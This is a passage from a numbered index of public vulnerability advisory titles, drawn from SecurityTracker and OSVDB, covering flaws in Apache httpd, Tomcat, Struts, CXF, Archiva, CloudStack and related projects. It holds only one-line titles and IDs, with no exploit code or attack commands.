7817| [1028287] Apache CXF WSS4JInInterceptor Grants Service Access to Remote Users
7818| [1028286] Apache CXF WS-Security UsernameToken Processing Flaw Lets Remote Users Bypass Authentication
7819| [1028252] Apache Commons FileUpload Unsafe Temporary File Lets Local Users Gain Elevated Privileges
7820| [1028207] Apache Input Validation Bugs Permit Cross-Site Scripting Attacks
7821| [1027836] Apache Tomcat Connection Processing Bug Lets Remote Users Deny Service
7822| [1027834] Apache Tomcat Bug Lets Remote Users Bypass Cross-Site Request Forgery Prevention Filter
7823| [1027833] Apache Tomcat Bug Lets Remote Users Bypass Security Constraints
7824| [1027729] Apache Tomcat Header Processing Bug Lets Remote Users Deny Service
7825| [1027728] Apache Tomcat Lets Remote Users Conduct DIGEST Authentication Replay Attacks
7826| [1027554] Apache CXF Lets Remote Authenticated Users Execute Unauthorized SOAP Actions
7827| [1027508] Apache Wicket Input Validation Flaw Permits Cross-Site Scripting Attacks
7828| [1027421] Apache Web Server Bugs Permit Cross-Site Scripting and Information Disclosure Attacks
7829| [1027096] Apache Commons Compress BZip2CompressorOutputStream() Sorting Algorithm Lets Remote or Local Users Deny Service
7830| [1026932] Apache LD_LIBRARY_PATH Processing Lets Local Users Gain Elevated Privileges
7831| [1026928] Apache OFBiz Unspecified Flaw Lets Remote Users Execute Arbitrary Code
7832| [1026927] Apache OFBiz Input Validation Flaws Permit Cross-Site Scripting Attacks
7833| [1026847] Apache Traffic Server Host Header Processing Flaw Lets Remote Users Deny Service
7834| [1026846] Apache Wicket Discloses Hidden Application Files to Remote Users
7835| [1026839] Apache Wicket Input Validation Flaw in 'wicket:pageMapName' Parameter Permits Cross-Site Scripting Attacks
7836| [1026616] Apache Bugs Let Remote Users Deny Service and Obtain Cookie Data
7837| [1026575] Apache Struts ParameterInterceptor() Flaw Lets Remote Users Execute Arbitrary Commands
7838| [1026484] Apache Struts Bug Lets Remote Users Overwrite Files and Execute Arbitrary Code
7839| [1026477] Apache Tomcat Hash Table Collision Bug Lets Remote Users Deny Service
7840| [1026402] Apache Struts Conversion Error Lets Remote Users Inject Arbitrary Commands
7841| [1026353] Apache mod_proxy/mod_rewrite Bug Lets Remote Users Access Internal Servers
7842| [1026295] Apache Tomcat Lets Untrusted Web Applications Gain Elevated Privileges
7843| [1026267] Apache .htaccess File Integer Overflow Lets Local Users Execute Arbitrary Code
7844| [1026144] Apache mod_proxy Pattern Matching Bug Lets Remote Users Access Internal Servers
7845| [1026095] Apache Tomcat HTTP DIGEST Authentication Weaknesses Let Remote Users Conduct Bypass Attacks
7846| [1026054] Apache mod_proxy_ajp HTTP Processing Error Lets Remote Users Deny Service
7847| [1025993] Apache Tomcat AJP Protocol Processing Bug Lets Remote Users Bypass Authentication or Obtain Information
7848| [1025976] Apache Wicket Input Validation Flaw Permits Cross-Site Scripting Attacks
7849| [1025960] Apache httpd Byterange Filter Processing Error Lets Remote Users Deny Service
7850| [1025925] Apache Tomcat Commons Daemon jsvc Lets Local Users Gain Elevated Privileges
7851| [1025924] Apache Tomcat XML Validation Flaw Lets Applications Obtain Potentially Sensitive Information
7852| [1025788] Apache Tomcat Lets Malicious Applications Obtain Information and Deny Service
7853| [1025755] Apache Santuario Buffer Overflow Lets Remote Users Deny Service
7854| [1025712] Apache Tomcat Discloses Passwords to Local Users in Certain Cases
7855| [1025577] Apache Archiva Input Validation Hole Permits Cross-Site Scripting Attacks
7856| [1025576] Apache Archiva Request Validation Flaw Permits Cross-Site Request Forgery Attacks
7857| [1025527] Apache APR Library apr_fnmatch() Flaw Lets Remote Users Execute Arbitrary Code
7858| [1025303] Apache Tomcat HTTP BIO Connector Error Discloses Information From Different Requests to Remote Users
7859| [1025215] Apache Tomcat May Ignore @ServletSecurity Annotation Protections
7860| [1025066] Apache Continuum Input Validation Flaw Permits Cross-Site Request Forgery Attacks
7861| [1025065] Apache Continuum Input Validation Hole Permits Cross-Site Scripting Attacks
7862| [1025027] Apache Tomcat maxHttpHeaderSize Parsing Error Lets Remote Users Deny Service
7863| [1025026] Apache Tomcat Manager Input Validation Hole Permits Cross-Site Scripting Attacks
7864| [1025025] Apache Tomcat Security Manager Lets Local Users Bypass File Permissions
7865| [1024764] Apache Tomcat Manager Input Validation Hole in 'sessionList.jsp' Permits Cross-Site Scripting Attacks
7866| [1024417] Apache Traffic Server Insufficient Randomization Lets Remote Users Poison the DNS Cache
7867| [1024332] Apache mod_cache and mod_dav Request Processing Flaw Lets Remote Users Deny Service
7868| [1024180] Apache Tomcat 'Transfer-Encoding' Header Processing Flaw Lets Remote Users Deny Service and Obtain Potentially Sensitive Information
7869| [1024096] Apache mod_proxy_http May Return Results for a Different Request
7870| [1023942] Apache mod_proxy_ajp Error Condition Lets Remote Users Deny Service
7871| [1023941] Apache ap_read_request() Memory Error May Let Remote Users Access Potentially Sensitive Information
7872| [1023778] Apache ActiveMQ Input Validation Flaw Permits Cross-Site Scripting Attacks
7873| [1023701] Apache mod_isapi Error Processing Flaw May Let Remote Users Deny Service
7874| [1023533] Apache mod_proxy Integer Overflow May Let Remote Users Execute Arbitrary Code
7875| [1022988] Apache Solaris Support Code Bug Lets Remote Users Deny Service
7876| [1022529] Apache mod_deflate Connection State Bug Lets Remote Users Deny Service
7877| [1022509] Apache mod_proxy stream_reqbody_cl() Infinite Loop Lets Remote Users Deny Service
7878| [1022296] Apache IncludesNoExec Options Restrictions Can Be Bypass By Local Users
7879| [1022264] Apache mod_proxy_ajp Bug May Disclose Another User's Response Data
7880| [1022001] Apache Tomcat mod_jk May Disclose Responses to the Wrong User
7881| [1021988] mod_perl Input Validation Flaw in Apache::Status and Apache2::Status Permits Cross-Site Scripting Attacks
7882| [1021350] NetWare Bug Lets Remote Users Access the ApacheAdmin Console
7883| [1020635] Apache Input Validation Hole in mod_proxy_ftp Permits Cross-Site Scripting Attacks
7884| [1020520] Oracle WebLogic Apache Connector Lets Remote Users Execute Arbitrary Code
7885| [1020267] Apache mod_proxy Interim Response Process Bug Lets Remote Users Deny Service
7886| [1019784] Apache-SSL Certificate Processing Bug May Let Remote Users View Portions of Kernel Memory
7887| [1019256] Apache mod_negotiation Input Validation Hole Permits Cross-Site Scripting Attacks
7888| [1019194] Apache Input Validation Hole in Mod_AutoIndex When the Character Set is Undefined May Permit Cross-Site Scripting Attacks
7889| [1019185] Apache Input Validation Hole in mod_proxy_ftp Permits Cross-Site Scripting Attacks
7890| [1019154] Apache Input Validation Hole in mod_status Permits Cross-Site Scripting Attacks
7891| [1019093] Apache Input Validation Hole in mod_imap Permits Cross-Site Scripting Attacks
7892| [1019030] Apache Input Validation Hole in Default HTTP 413 Error Page Permits Cross-Site Scripting Attacks
7893| [1018633] Apache mod_proxy Bug Lets Remote Users Deny Service
7894| [1018304] Apache HTTPD scoreboard Protection Flaw Lets Local Users Terminate Arbitrary Processes
7895| [1018303] Apache HTTPD mod_cache May Let Remote Users Deny Service
7896| [1018302] Apache mod_status Input Validation Hole Permits Cross-Site Scripting Attacks
7897| [1018269] Apache Tomcat Input Validation Hole in Processing Accept-Language Header Permits Cross-Site Scripting Attacks
7898| [1017904] Apache suEXEC Bugs May Let Local Users Gain Elevated Privileges
7899| [1017719] Apache Tomcat JK Web Server Connector Buffer Overflow in map_uri_to_worker() Lets Remote Users Execute Arbitrary Code
7900| [1017062] Apache mod_tcl Format String Bug in set_var() Function May Let Remote Users Execute Arbitrary Code
7901| [1016601] Apache mod_rewrite Off-by-one Error Lets Remote Users Execute Arbitrary Code
7902| [1016576] Apache Tomcat Discloses Directory Listings to Remote Users
7903| [1015447] Apache mod_ssl Null Pointer Dereference May Let Remote Users Deny Service
7904| [1015344] Apache mod_imap Input Validation Flaw in Referer Field Lets Remote Users Conduct Cross-Site Scripting Attacks
7905| [1015093] Apache Memory Leak in MPM 'worker.c' Code May Let Remote Users Deny Service
7906| [1014996] ApacheTop Unsafe Temporary File May Let Local Users Gain Elevated Privileges
7907| [1014833] Apache ssl_hook_Access() Function May Fail to Verify Client Certificates
7908| [1014826] Apache Memory Leak in 'byterange filter' Lets Remote Users Deny Service
7909| [1014575] Apache mod_ssl Off-by-one Buffer Overflow in Processing CRLs May Let Remote Users Deny Service
7910| [1014323] Apache Chunked Transfer-Encoding and Content-Length Processing Lets Remote Users Smuggle HTTP Requests
7911| [1013156] Apache mod_python Publisher Handler Discloses Information to Remote Users
7912| [1012829] Apache mod_auth_radius radcpy() Integer Overflow Lets Remote Users Deny Service in Certain Cases
7913| [1012416] Apache on Apple OS X Lets Remote Users Bypass Apache File Handlers and Directly Access Files
7914| [1012415] Apache on Apple HFS+ Filesystems May Disclose '.DS_Store' Files to Remote Users
7915| [1012414] Apache mod_digest_apple Lets Remote Users Replay Authentication Credentials
7916| [1012083] Apache Web Server Error in Processing Requests With Many Space Characters Lets Remote Users Deny Service
7917| [1011783] Apache mod_include Buffer Overflow Lets Local Users Execute Arbitrary Code
7918| [1011557] Apache mod_ssl SSLCipherSuite Directive Can By Bypassed in Certain Cases
7919| [1011385] Apache Satsify Directive Error May Let Remote Users Access Restricted Resources
7920| [1011340] Apache SSL Connection Abort State Error Lets Remote Users Deny Service
7921| [1011303] Apache ap_resolve_env() Buffer Overflow in Reading Configuration Files May Let Local Users Gain Elevated Privileges
7922| [1011299] Apache IPv6 Address Parsing Flaw May Let Remote Users Deny Service
7923| [1011248] Apache mod_dav LOCK Method Error May Let Remote Users Deny Service
7924| [1011213] Apache mod_ssl Can Be Crashed By Remote Users When Reverse Proxying SSL Connections
7925| [1010674] Apache Can Be Crashed By PHP Code Invoking Nested Remote Sockets
7926| [1010599] Apache httpd Header Line Memory Allocation Lets Remote Users Crash the Server
7927| [1010462] Apache mod_proxy Buffer Overflow May Let Remote Users Execute Arbitrary Code
7928| [1010322] Apache mod_ssl Stack Overflow in ssl_util_uuencode_binary() May Let Remote Users Execute Arbitrary Code
7929| [1010270] cPanel Apache mod_phpsuexec Options Let Local Users Gain Elevated Privileges
7930| [1009934] Apache Web Server Has Buffer Overflow in ebcdic2ascii() on Older Processor Architectures
7931| [1009516] Apache mod_survey HTML Report Format Lets Remote Users Conduct Cross-Site Scripting Attacks
7932| [1009509] Apache mod_disk_cache Stores Authentication Credentials on Disk
7933| [1009495] Apache Web Server Socket Starvation Flaw May Let Remote Users Deny Service
7934| [1009417] GroupWise WebAccess With Apache on NetWare Has Configuration Flaw That May Grant Web Access to Remote Users
7935| [1009338] Apache mod_access Parsing Flaw May Fail to Enforce Allow/Deny Rules
7936| [1009337] Apache mod_ssl Memory Leak Lets Remote Users Crash the Daemon
7937| [1009182] Apache for Cygwin '..%5C' Input Validation Flaw Discloses Files to Remote Users
7938| [1008973] PHP May Apply Incorrect php_admin_* Settings To Requests for Apache Virtual Hosts
7939| [1008967] Apache-SSL 'SSLFakeBasicAuth' Lets Remote Users Forge Client Certificates to Be Authenticated
7940| [1008920] Apache mod_digest May Validate Replayed Client Responses
7941| [1008828] Apache mod_python String Processing Bug Still Lets Remote Users Crash the Web Server
7942| [1008822] Apache mod_perl File Descriptor Leak May Let Local Users Hijack the http and https Services
7943| [1008675] mod_auth_shadow Apache Module Authenticates Expired Passwords
7944| [1008559] Apache mod_php File Descriptor Leak May Let Local Users Hijack the https Service
7945| [1008335] Apache mod_python String Processing Bug Lets Remote Users Crash the Web Server
7946| [1008196] Apache 2.x on Windows May Return Unexpected Files For URLs Ending With Certain Characters
7947| [1008030] Apache mod_rewrite Contains a Buffer Overflow
7948| [1008029] Apache mod_alias Contains a Buffer Overflow
7949| [1008028] Apache mod_cgid May Disclose CGI Output to Another Client
7950| [1007995] Apache Cocoon Forms May Let Remote Users Execute Arbitrary Java Code on the System
7951| [1007993] Apache Cocoon 'view-source' Sample Script Discloses Files to Remote Users
7952| [1007823] Apache Web Server mod_cgi Error May Let Malicious CGI Scripts Crash the Web Service
7953| [1007664] Apache::Gallery Unsafe Temporary Files May Let Local Users Gain Apache Web Server Privileges
7954| [1007557] Apache Web Server Does Not Filter Terminal Escape Sequences From Log Files
7955| [1007230] Apache HTTP Server 'rotatelogs' Bug on Win32 and OS/2 May Cause the Logging to Stop
7956| [1007146] Apache HTTP Server FTP Proxy Bug May Cause Denial of Service Conditions
7957| [1007145] Apache 'accept()' Errors May Cause Denial of Service Conditions
7958| [1007144] Apache Web Server 'type-map' File Error Permits Local Denial of Service Attacks
7959| [1007143] Apache 2.0 Web Server May Use a Weaker Encryption Implementation Than Specified in Some Cases
7960| [1006864] Apache Web Server Can Be Crashed By Remote Users Via mod_dav Flaws and Also Via Basic Authentication
7961| [1006709] Apache mod_survey Input Validation Flaw Lets Remote Users Fill Up Disk Space
7962| [1006614] Apache mod_ntlm Buffer Overflow and Format String Flaw Let Remote Users Execute Arbitary Code
7963| [1006591] Apache mod_access_referer Module Null Pointer Dereference May Faciliate Denial of Service Attacks
7964| [1006444] Apache 2.0 Web Server Line Feed Buffer Allocation Flaw Lets Remote Users Deny Service
7965| [1006021] Apache Tomcat Server URL Parsing Error May Disclose Otherwise Inaccessible Web Directory Listings and Files to Remote Users
7966| [1005963] Apache Web Server 2.x Windows Device Access Flaw Lets Remote Users Crash the Server or Possibly Execute Arbitrary Code
7967| [1005962] Apache Web Server Path Parsing Flaw May Allow Remote Users to Execute Code in Certain Configurations
7968| [1005848] Apache 'printenv' Script Input Validation Bugs in Older Versions May Let Remote Users Conduct Cross-Site Scripting Attacks
7969| [1005765] Apache mod_jk Module Processing Bug When Used With Tomcat May Disclose Information to Remote Users or Crash
7970| [1005548] Apache mod_php Module May Allow Local Users to Gain Control of the Web Port
7971| [1005499] Apache Web Server (2.0.42) May Disclose CGI Source Code to Remote Users When Used With WebDAV
7972| [1005410] Apache Tomcat Java Servlet Engine Can Be Crashed Via Multiple Requests for DOS Device Names
7973| [1005351] Apache Web Server (1.3.x) Shared Memory Scoreboard Bug Lets Certain Local Users Issue Signals With Root Privileges
7974| [1005331] Apache Web Server (2.x) SSI Server Signature Filtering Hole Lets Remote Users Conduct Cross-Site Scripting Attacks
7975| [1005290] Apache Tomcat Java Server Default Servlet Returns JSP Source Code to Remote Users
7976| [1005285] Apache Web Server 'mod_dav' Has Null Pointer Bug That May Allow Remote Users to Cause Denial of Service Conditions
7977| [1005010] Apache Web Server (2.0) Has Unspecified Flaw That Allows Remote Users to Obtain Sensitive Data and Cause Denial of Service Conditions
7978| [1004770] Apache 2.x Web Server ap_log_rerror() Function May Disclose Full Installation Path to Remote Users
7979| [1004745] Apache Tomcat Java Server Allows Cross-Site Scripting Attacks
7980| [1004636] Apache mod_ssl 'Off-by-One' Bug May Let Local Users Crash the Web Server or Possibly Execute Arbitrary Code
7981| [1004602] Apache Tomcat Java Server for Windows Can Be Crashed By Remote Users Sending Malicious Requests to Hang All Available Working Threads
7982| [1004586] Apache Tomcat Java Server May Disclose the Installation Path to Remote Users
7983| [1004555] Apache Web Server Chunked Encoding Flaw May Let Remote Users Execute Arbitrary Code on the Server
7984| [1004209] Apache 'mod_python' Python Language Interpreter Bug in Publisher Handler May Allow Remote Users to Modify Files on the System
7985| [1003874] Apache Web Server for Windows Has Batch File Processing Hole That Lets Remote Users Execute Commands on the System
7986| [1003767] 'mod_frontpage' Module for Apache Web Server Has Buffer Overlow in 'fpexec.c' That Allows Remote Users to Execute Arbitrary Code on the System with Root Privileges
7987| [1003723] Apache-SSL for Apache Web Server Has Buffer Overflow That Can Be Triggered By Remote Users
7988| [1003664] 'mod_ssl' Security Package for Apache Web Server Has Buffer Overflow That Can Be Triggered By Remote Users
7989| [1003602] GNUJSP Java Server Pages Implementation Discloses Web Files and Source Code to Remote Users and Bypasses Apache Access Control Restrictions
7990| [1003465] PHP for Apache Web Server May Disclose Installation Path Information to Remote Users Making 'OPTIONS' Requests
7991| [1003451] Oracle Application Server PL/SQL Module for Apache Has Buffer Overflows That Allow Remote Users to Execute Arbitrary Code and Gain Access to the Server
7992| [1003131] Apache Web Server in Virtual Hosting Mode Can Be Crashed By a Local User Removing a Log Directory
7993| [1003104] PHP.EXE Windows CGI for Apache Web Server May Let Remote Users View Files on the Server Due to Configuration Error
7994| [1003008] Apache 'mod_bf' Module Lets Remote Users Execute Arbitrary Code
7995| [1002629] Apache suEXEC Wrapper Fails to Observe Minimum Group ID Security Settings in Certain Situations
7996| [1002542] Apache Web Server Virtual Hosting Split-Logfile Function Lets Remote Users Write Log Entries to Arbitrary Files on the System
7997| [1002400] Apache mod_gzip Module Has Buffer Overflow That Can Be Exploited By Local Users to Gain Elevated Privileges
7998| [1002303] Several 3rd Party Apache Authentication Modules Allow Remote Users to Execute Arbitrary Code to Gain Access to the System or Execute Stored Procedures to Obtain Arbitrary Database Information
7999| [1002188] Apache Web Server Discloses Internal IP Addresses to Remote Users in Certain Configurations
8000| [1001989] Apache Web Server May Disclose Directory Contents Even If an Index.html File is Present in the Directory
8001| [1001719] Apache Web Server on Mac OS X Client Fails to Enforce File and Directory Access Protections, Giving Remote Users Access to Restricted Pages
8002| [1001572] Apache Web Server on Microsoft Windows Platforms Allows Remote Users to Crash the Web Server
8003| [1001304] Apache Web Server for Windows Lets Remote Users Crash the Web Server Application
8004| [1001083] Apache Web Server May Display Directory Index Listings Even if Directory Listings Are Disabled
8005|
8006| OSVDB - http://www.osvdb.org:
8007| [96078] Apache CloudStack Infrastructure Menu Setup Network Multiple Field XSS
8008| [96077] Apache CloudStack Global Settings Multiple Field XSS
8009| [96076] Apache CloudStack Instances Menu Display Name Field XSS
8010| [96075] Apache CloudStack Instances Menu Add Instances Network Name Field XSS
8011| [96074] Apache CloudStack Instances Menu Add Instances Review Step Multiple Field XSS
8012| [96031] Apache HTTP Server suEXEC Symlink Arbitrary File Access
8013| [95888] Apache Archiva Single / Double Quote Character Handling XSS Weakness
8014| [95885] Apache Subversion mod_dav_svn Module Crafted HTTP Request Handling Remote DoS
8015| [95706] Apache OpenOffice.org (OOo) OOXML Document File XML Element Handling Memory Corruption
8016| [95704] Apache OpenOffice.org (OOo) DOC File PLCF Data Handling Memory Corruption
8017| [95603] Apache Continuum web/util/GenerateRecipentNotifier.java recipient Parameter XSS
8018| [95602] Apache Continuum web/action/notifier/JabberProjectNotifierEditAction-jabberProjectNotifierSave-validation.xml Multiple Parameter XSS
8019| [95601] Apache Continuum web/action/notifier/JabberGroupNotifierEditAction-jabberProjectGroupNotifierSave-validation.xml Multiple Parameter XSS
8020| [95600] Apache Continuum web/action/ScheduleAction-saveSchedule-validation.xml Multiple Parameter XSS
8021| [95599] Apache Continuumweb/action/BuildDefinitionAction-saveBuildDefinition-validation.xml Multiple Parameter XSS
8022| [95598] Apache Continuum web/action/AddProjectAction-addProject-validation.xml Multiple Parameter XSS
8023| [95597] Apache Continuum web/action/ProjectEditAction-projectSave-validation.xml Multiple Parameter XSS
8024| [95596] Apache Continuum web/action/notifier/IrcGroupNotifierEditAction-ircProjectGroupNotifierSave-validation.xml Multiple Parameter XSS
8025| [95595] Apache Continuum web/action/notifier/IrcProjectNotifierEditAction-ircProjectNotifierSave-validation.xml Multiple Parameter XSS
8026| [95594] Apache Continuum web/action/ProjectGroupAction.java Multiple Parameter XSS
8027| [95593] Apache Continuum web/action/AddProjectGroupAction.java Multiple Parameter XSS
8028| [95592] Apache Continuum web/action/AddProjectAction.java Multiple Parameter XSS
8029| [95523] Apache OFBiz Webtools Application View Log Screen Unspecified XSS
8030| [95522] Apache OFBiz Nested Expression Evaluation Arbitrary UEL Function Execution
8031| [95521] Apache HTTP Server mod_session_dbd Session Saving Unspecified Issue
8032| [95498] Apache HTTP Server mod_dav.c Crafted MERGE Request Remote DoS
8033| [95406] Apache Struts DefaultActionMapper Multiple Prefixing Parameters Arbitrary Site Redirect
8034| [95405] Apache Struts DefaultActionMapper Multiple Prefixing Parameters Remote Code Execution
8035| [95011] Apache CXF XML Parser SOAP Message Handling CPU Resource Exhaustion Remote DoS
8036| [94705] Apache Geronimo RMI Classloader Exposure Serialized Object Handling Remote Code Execution
8037| [94651] Apache Santuario (XML Security for C++) XML Signature CanonicalizationMethod Parameter Spoofing Weakness
8038| [94636] Apache Continuum workingCopy.action userDirectory Traversal Arbitrary File Access
8039| [94635] Apache Maven SCM SvnCommandlineUtils Process Listing Local Password Disclosure
8040| [94632] Apache Maven Wagon SSH (wagon-ssh) Host Verification Failure MitM Weakness
8041| [94625] Apache Santuario (XML Security for C++) XML Signature Reference Crafted XPointer Expression Handling Heap Buffer Overflow
8042| [94618] Apache Archiva /archiva/security/useredit.action username Parameter XSS
8043| [94617] Apache Archiva /archiva/security/roleedit.action name Parameter XSS
8044| [94616] Apache Archiva /archiva/security/userlist!show.action roleName Parameter XSS
8045| [94615] Apache Archiva /archiva/deleteArtifact!doDelete.action groupId Parameter XSS
8046| [94614] Apache Archiva /archiva/admin/addLegacyArtifactPath!commit.action legacyArtifactPath.path Parameter XSS
8047| [94613] Apache Archiva /archiva/admin/addRepository.action Multiple Parameter XSS
8048| [94612] Apache Archiva /archiva/admin/editAppearance.action Multiple Parameter XSS
8049| [94611] Apache Archiva /archiva/admin/addLegacyArtifactPath.action Multiple Parameter XSS
8050| [94610] Apache Archiva /archiva/admin/addNetworkProxy.action Multiple Parameter XSS
8051| [94403] Apache Santuario (XML Security for C++) InclusiveNamespace PrefixList Processing Heap Overflow
8052| [94402] Apache Santuario (XML Security for C++) HMAC-based XML Signature Processing DoS
8053| [94401] Apache Santuario (XML Security for C++) XPointer Evaluation Stack Overflow
8054| [94400] Apache Santuario (XML Security for C++) HMAC-Based XML Signature Reference Element Validation Spoofing Weakness
8055| [94279] Apache Qpid CA Certificate Validation Bypass
8056| [94275] Apache Solr JettySolrRunner.java Can Not Find Error Message XSS
8057| [94233] Apache OpenJPA Object Deserialization Arbitrary Executable Creation
8058| [94042] Apache Axis JAX-WS Java Unspecified Exposure
8059| [93969] Apache Struts OGNL Expression Handling Double Evaluation Error Remote Command Execution
8060| [93796] Apache Subversion Filename Handling FSFS Repository Corruption Remote DoS
8061| [93795] Apache Subversion svnserve Server Aborted Connection Message Handling Remote DoS
8062| [93794] Apache Subversion contrib/hook-scripts/check-mime-type.pl svnlook Hyphenated argv Argument Handling Remote DoS
8063| [93793] Apache Subversion contrib/hook-scripts/svn-keyword-check.pl Filename Handling Remote Command Execution
8064| [93646] Apache Struts Crafted Parameter Arbitrary OGNL Code Execution
8065| [93645] Apache Struts URL / Anchor Tag includeParams Attribute Remote Command Execution
8066| [93636] Apache Pig Multiple Physical Operator Memory Exhaustion Remote Remote DoS
8067| [93635] Apache Wink DTD (Document Type Definition) Expansion Data Parsing Information Disclosure
8068| [93605] RT Apache::Session::File Session Replay Reuse Information Disclosure
8069| [93599] Apache Derby SYSCS_UTIL.SYSCS_SET_DATABASE_PROPERTY Boot Password Manipulation Re-encryption Failure Password Corruption
8070| [93555] Apache Commons Codec Invalid Base32 String Information Tunneling Weakness
8071| [93554] Apache HBase bulkLoadHFiles() Method ACL Bypass
8072| [93543] JBoss Enterprise Application Platform org.apache.catalina.connector.Response.encodeURL() Method MitM jsessionid Disclosure
8073| [93542] Apache ManifoldCF (Connectors Framework) org.apache.manifoldcf.crawler.ExportConfiguration Class Configuration Export Password Disclosure
8074| [93541] Apache Solr json.wrf Callback XSS
8075| [93524] Apache Hadoop GetSecurityDescriptorControl() Function Absolute Security Descriptor Handling NULL Descriptor Weakness
8076| [93521] Apache jUDDI Security API Token Session Persistence Weakness
8077| [93520] Apache CloudStack Default SSL Key Weakness
8078| [93519] Apache Shindig /ifr Cross-site Arbitrary Gadget Invocation
8079| [93518] Apache Solr /admin/analysis.jsp name Parameter XSS
8080| [93517] Apache CloudStack setup-cloud-management /etc/sudoers Modification Local Privilege Escalation
8081| [93516] Apache CXF UsernameTokenInterceptor Nonce Caching Replay Weakness
8082| [93515] Apache HBase table.jsp name Parameter XSS
8083| [93514] Apache CloudStack Management Server Unauthenticated Remote JMX Connection Default Setting Weakness
8084| [93463] Apache Struts EL / OGNL Interpretation Unspecified Remote Code Execution
8085| [93462] Apache CXF WS-SecurityPolicy AlgorithmSuite Arbitrary Ciphertext Decryption Weakness
8086| [93401] Apache Hadoop core-site.xml Permission Weakness Local Alfredo Secret Disclosure
8087| [93400] Apache Hadoop Map/Reduce Job Log Directory Symlink Arbitrary File Mode Manipulation
8088| [93397] Apache Wicket Referrer HTTP Header Session ID Disclosure
8089| [93366] Apache HTTP Server modules/mappers/mod_rewrite.c do_rewritelog() Function Log File Terminal Escape Sequence Filtering Remote Command Execution
8090| [93254] Apache Tomcat AsyncListener Method Cross-session Information Disclosure
8091| [93253] Apache Tomcat Chunked Transfer Encoding Data Saturation Remote DoS
8092| [93252] Apache Tomcat FORM Authenticator Session Fixation
8093| [93172] Apache Camel camel/endpoints/ Endpoint XSS
8094| [93171] Apache Sling HtmlResponse Error Message XSS
8095| [93170] Apache Directory DelegatingAuthenticator MitM Spoofing Weakness
8096| [93169] Apache Wave AuthenticationServlet.java Session Fixation Weakness
8097| [93168] Apache Click ErrorReport.java id Parameter XSS
8098| [93167] Apache ActiveMQ JMSXUserId Spoofing Weakness
8099| [93166] Apache CXF Crafted Message Element Count Handling System Resource Exhaustion Remote DoS
8100| [93165] Apache CXF Crafted Message Element Level Handling System Resource Exhaustion Remote DoS
8101| [93164] Apache Harmony DatagramSocket Class connect Method CheckAccept() IP Blacklist Bypass
8102| [93163] Apache Hadoop Map/Reduce Daemon Symlink Arbitrary File Overwrite
8103| [93162] Apache VelocityStruts struts/ErrorsTool.getMsgs Error Message XSS
8104| [93161] Apache CouchDB Rewriter VM Atom Table Memory Exhaustion Remote DoS
8105| [93158] Apache Wicket BookmarkablePageLink Feature XSS CSRF
8106| [93157] Apache Struts UrlHelper.java s:url includeParams Functionality XSS
8107| [93156] Apache Tapestry Calendar Component datefield.js datefield Parameter XSS
8108| [93155] Apache Struts fielderror.ftl fielderror Parameter Error Message XSS
8109| [93154] Apache JSPWiki Edit.jsp createPages WikiPermission Bypass
8110| [93153] Apache PDFBox PDFXrefStreamParser Missing Element Handling PDF Parsing DoS
8111| [93152] Apache Hadoop HttpServer.java Multiple Function XSS
8112| [93151] Apache Shiro Search Filter userName Parameter LDAP Code Injection Weakness
8113| [93150] Apache Harmony java.net.SocketPermission Class boolean equals Function checkConnect() Weakness Host Name Retrieval
8114| [93149] Apache Harmony java.security.Provider Class void load Function checkSecurityAccess() Weakness
8115| [93148] Apache Harmony java.security.ProtectionDomain Class java.lang.String.toString() Function checkPermission() Weakness
8116| [93147] Apache Harmony java.net.URLConnection openConnection Function checkConnect Weakness Proxy Connection Permission Bypass
8117| [93146] Apache Harmony java.net.ServerSocket Class void implAccept Function checkAccept() Weakness SerSocket Subclass Creation
8118| [93145] Apache Qpid JMS Client Detached Session Frame Handling NULL Pointer Dereference Remote DoS
8119| [93144] Apache Solr Admin Command Execution CSRF
8120| [93009] Apache VCL XMLRPC API Unspecified Function Remote Privilege Escalation
8121| [93008] Apache VCL Web GUI Unspecified Remote Privilege Escalation
8122| [92997] Apache Commons Codec org.apache.commons.codec.net.URLCodec Fields Missing 'final' Thread-safety Unspecified Issue
8123| [92976] Apache ActiveMQ scheduled.jsp crontab Command XSS
8124| [92947] Apache Commons Codec org.apache.commons.codec.language.Soundex.US_ENGLISH_MAPPING Missing MS_PKGPROTECT Field Manipulation Unspecified Issue
8125| [92749] Apache CloudStack Predictable Hash Virtual Machine Console Console Access URL Generation
8126| [92748] Apache CloudStack VM Console Access Restriction Bypass
8127| [92709] Apache ActiveMQ Web Console Unauthenticated Remote Access
8128| [92708] Apache ActiveMQ Sample Web Application Broker Resource Consumption Remote DoS
8129| [92707] Apache ActiveMQ webapp/websocket/chat.js Subscribe Message XSS
8130| [92706] Apache ActiveMQ Debug Log Rendering XSS
8131| [92705] Apache ActiveMQ PortfolioPublishServlet.java refresh Parameter XSS
8132| [92270] Apache Tomcat Unspecified CSRF
8133| [92094] Apache Subversion mod_dav_svn Module Nonexistent URL Lock Request Handling NULL Pointer Dereference Remote DoS
8134| [92093] Apache Subversion mod_dav_svn Module Activity URL PROPFIND Request Handling NULL Pointer Dereference Remote DoS
8135| [92092] Apache Subversion mod_dav_svn Module Log REPORT Request Handling NULL Pointer Dereference Remote DoS
8136| [92091] Apache Subversion mod_dav_svn Module Node Property Handling Resource Exhaustion Remote DoS
8137| [92090] Apache Subversion mod_dav_svn Module Activity URL Lock Request Handling NULL Pointer Dereference Remote DoS
8138| [91774] Apache Commons Codec Unspecified Non-private Field Manipulation Weakness
8139| [91628] mod_ruid2 for Apache HTTP Server fchdir() Inherited File Descriptor chroot Restriction Bypass
8140| [91328] Apache Wicket $up$ Traversal Arbitrary File Access
8141| [91295] Apple Mac OS X Apache Unicode Character URI Handling Authentication Bypass
8142| [91235] Apache Rave /app/api/rpc/users/get User Object Hashed Password Remote Disclosure
8143| [91185] Munin Default Apache Configuration Permission Weakness Remote Information Disclosure
8144| [91173] Apache Wicket WebApplicationPath Constructor Bypass /WEB-INF/ Directory File Access
8145| [91172] Apache Wicket PackageResourceGuard File Extension Filter Bypass
8146| [91025] Apache Qpid qpid::framing::Buffer Class Multiple Method Out-of-bounds Access Remote DoS
8147| [91024] Apache Qpid federation_tag Attribute Handling Federated Interbroker Link Access Restriction Bypass
8148| [91023] Apache Qpid AMQP Type Decoder Exposure Array Size Value Handling Memory Consumption Remote DoS
8149| [91022] Apache Qpid qpid/cpp/include/qpid/framing/Buffer.h qpid::framing::Buffer::checkAvailable() Function Integer Overflow
8150| [90986] Apache Jena ARQ INSERT DATA Request Handling Overflow
8151| [90907] Apache Subversion mod_dav_svn / libsvn_fs svn_fs_file_length() Function MKACTIVITY / PROPFIND Option Request Handling Remote DoS
8152| [90906] Apache Commons FileUpload /tmp Storage Symlink Arbitrary File Overwrite
